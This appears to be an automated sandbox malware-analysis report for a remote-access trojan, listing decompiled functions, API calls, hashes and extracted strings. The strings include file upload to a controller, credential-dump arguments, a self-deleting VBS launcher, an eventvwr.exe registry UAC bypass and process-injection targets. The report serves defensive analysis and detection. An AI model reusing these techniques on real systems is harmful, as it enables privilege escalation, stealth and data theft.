WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7

Strings

RIFF, xrefs: 00401ADD
fmt , xrefs: 00401B0D
data, xrefs: 00401B91
WAVE, xrefs: 00401AFD

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3

Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044C69F
_free.LIBCMT ref: 0044C6C5
_free.LIBCMT ref: 0044C6EE
_free.LIBCMT ref: 0044C726
_free.LIBCMT ref: 0044C757
_free.LIBCMT ref: 0044C798
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044C819
_free.LIBCMT ref: 0044C832
_wcschr.LIBVCRUNTIME ref: 0044C86F
_free.LIBCMT ref: 0044C8DB
_free.LIBCMT ref: 0044C901
_free.LIBCMT ref: 0044C92A
_free.LIBCMT ref: 0044C95F
_free.LIBCMT ref: 0044C990
_free.LIBCMT ref: 0044C9D1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044CA56
_free.LIBCMT ref: 0044CA6F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D

Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044E4EA

Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7

_free.LIBCMT ref: 0044E4DF

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E501
_free.LIBCMT ref: 0044E516
_free.LIBCMT ref: 0044E521
_free.LIBCMT ref: 0044E543
_free.LIBCMT ref: 0044E556
_free.LIBCMT ref: 0044E564
_free.LIBCMT ref: 0044E56F
_free.LIBCMT ref: 0044E5A7
_free.LIBCMT ref: 0044E5AE
_free.LIBCMT ref: 0044E5CB
_free.LIBCMT ref: 0044E5E3

Strings

pF, xrefs: 0044E4BC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: pF
API String ID: 161543041-2973420481
Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18

Function 004137DC Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
LoadLibraryA.KERNEL32(?), ref: 0041386D
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
FreeLibrary.KERNEL32(00000000), ref: 00413894
LoadLibraryA.KERNEL32(?), ref: 004138CC
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
FreeLibrary.KERNEL32(00000000), ref: 004138E5
GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
FreeLibrary.KERNEL32(00000000), ref: 0041390B

Strings

\wship6, xrefs: 004138B4
freeaddrinfo, xrefs: 00413808
\ws2_32, xrefs: 00413855
getaddrinfo, xrefs: 004137E9, 00413887, 004138D8
getnameinfo, xrefs: 004137F8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE

Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
Sleep.KERNEL32(00000064), ref: 00411C63

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

/stext ", xrefs: 0041198C, 00411A2E, 00411ACD
@#G, xrefs: 00411D72
$.F, xrefs: 004119B6
@#G, xrefs: 00411E45

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$$.F$@#G$@#G
API String ID: 1223786279-2596709126
Opcode ID: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
Opcode Fuzzy Hash: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A

Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044D828
_free.LIBCMT ref: 0044D84C
_free.LIBCMT ref: 0044D859
_free.LIBCMT ref: 0044D87E
_free.LIBCMT ref: 0044D88B
_free.LIBCMT ref: 0044D894
_free.LIBCMT ref: 0044DB72
_free.LIBCMT ref: 0044DB7A

Strings

pF, xrefs: 0044D80E, 0044DAF7

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF
API String ID: 269201875-2973420481
Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754

Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133

Strings

ieinstal.exe, xrefs: 0040E0B9
Inj, xrefs: 0040E14F
!G, xrefs: 0040E061
0"G, xrefs: 0040E02D
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E0A2
ielowutil.exe, xrefs: 0040E0FA

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
API String ID: 193334293-3226144251
Opcode ID: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
Opcode Fuzzy Hash: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A

Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
RegCloseKey.ADVAPI32(?), ref: 0041A749

Strings

Publisher, xrefs: 0041A4DB
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041A431
DisplayName, xrefs: 0041A4C6
InstallLocation, xrefs: 0041A506
UninstallString, xrefs: 0041A52E
DisplayVersion, xrefs: 0041A4F2
InstallDate, xrefs: 0041A51A

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
Opcode Fuzzy Hash: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A

Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
GetCursorPos.USER32(?), ref: 0041B39E
SetForegroundWindow.USER32(?), ref: 0041B3A7
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
ExitProcess.KERNEL32 ref: 0041B41A
CreatePopupMenu.USER32 ref: 0041B420
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435

Strings

Close, xrefs: 0041B426

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59

Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004432D8
_free.LIBCMT ref: 004432EE
_free.LIBCMT ref: 004432FF
_free.LIBCMT ref: 00443310
_free.LIBCMT ref: 00443327
GetCPInfo.KERNEL32(?,?), ref: 0044336F

Part of subcall function 00450054: _free.LIBCMT ref: 004500BF

_free.LIBCMT ref: 0044351B
_free.LIBCMT ref: 0044352E
_free.LIBCMT ref: 0044353C
_free.LIBCMT ref: 00443547
_free.LIBCMT ref: 00443589
_free.LIBCMT ref: 00443591
_free.LIBCMT ref: 00443599
_free.LIBCMT ref: 004435A1
_free.LIBCMT ref: 004435AF

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: d352d52f1b9345d75488c5de9eae0d63737ffa17687bf4e8527101d8642b8356
Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
Opcode Fuzzy Hash: d352d52f1b9345d75488c5de9eae0d63737ffa17687bf4e8527101d8642b8356
Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24

Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
__aulldiv.LIBCMT ref: 00407D89

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
CloseHandle.KERNEL32(00000000), ref: 00407FA0
CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
CloseHandle.KERNEL32(00000000), ref: 00408038

Strings

SetFilePointerEx error, xrefs: 00408010
Uploading file to Controller: , xrefs: 00407E11
ReadFile error, xrefs: 00408004

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 3086580692-2596673759
Opcode ID: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
Opcode Fuzzy Hash: 7b17a8036d9f6e7d56edc0ad43bfc44500a09440ecc07cafeb796fefe75cf2ad
Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B

Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
ExitProcess.KERNEL32 ref: 0040C57D

Strings

Temp, xrefs: 0040C453
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C4B2
.vbs, xrefs: 0040C418
""", 0, xrefs: 0040C49A
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C520
open, xrefs: 0040C56B
exepath, xrefs: 0040C3EA
H"G, xrefs: 0040C3C8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
API String ID: 1913171305-2600661426
Opcode ID: 858c96d2eebee9d2ed453ef73d9a1e38767332891e31fed0b9ff785c69f907f2
Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
Opcode Fuzzy Hash: 858c96d2eebee9d2ed453ef73d9a1e38767332891e31fed0b9ff785c69f907f2
Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99

Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 004136B6, 004136BE, 004136C2
65535, xrefs: 00413609

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E

Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
__dosmaperr.LIBCMT ref: 00438646
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
__dosmaperr.LIBCMT ref: 00438683
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
__dosmaperr.LIBCMT ref: 004386D7
_free.LIBCMT ref: 004386E3
_free.LIBCMT ref: 004386EA

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 2428d6136fa203607d9b9ba94df6370f818a7f930700a212aadf753765814adb
Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
Opcode Fuzzy Hash: 2428d6136fa203607d9b9ba94df6370f818a7f930700a212aadf753765814adb
Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69

Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DC74
_free.LIBCMT ref: 0044DC82
_free.LIBCMT ref: 0044DDB0
_free.LIBCMT ref: 0044DDBB

Strings

pF, xrefs: 0044DC30, 0044DDF5
tF, xrefs: 0044DE0C

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF$tF
API String ID: 269201875-2954683558
Opcode ID: f1956a37fb57c14efad3a30e8a4a694615c5a3291379cc37ed6cd6fb8765ce3b
Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
Opcode Fuzzy Hash: f1956a37fb57c14efad3a30e8a4a694615c5a3291379cc37ed6cd6fb8765ce3b
Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58

Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040549F
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
TranslateMessage.USER32(?), ref: 0040555E
DispatchMessageA.USER32(?), ref: 00405569
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

CloseChat, xrefs: 004055E9
DisplayMessage, xrefs: 004055CC
GetMessage, xrefs: 004055D8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: eb881b910dc8f90dddaf4e8bc84f9c5ff221e41cd07db74d4947057dfcb05d87
Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
Opcode Fuzzy Hash: eb881b910dc8f90dddaf4e8bc84f9c5ff221e41cd07db74d4947057dfcb05d87
Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A

Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
CloseHandle.KERNEL32(00000000), ref: 00416123
DeleteFileA.KERNEL32(00000000), ref: 00416132
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

Temp, xrefs: 0041603E
@%G, xrefs: 0041615F
<, xrefs: 004160C1
@%G, xrefs: 004160F3
@, xrefs: 004160C8

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$@%G$@%G$Temp
API String ID: 1704390241-4139030828
Opcode ID: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
Opcode Fuzzy Hash: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99

Function 004066A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 78COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
ExitProcess.KERNEL32 ref: 00406782

Strings

H"G, xrefs: 004066E8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 00406730
eventvwr.exe, xrefs: 0040674F
mscfile\shell\open\command, xrefs: 004066D4
origmsc, xrefs: 00406710
Software\Classes\mscfile\shell\open\command, xrefs: 0040673F
open, xrefs: 0040676E

Memory Dump Source

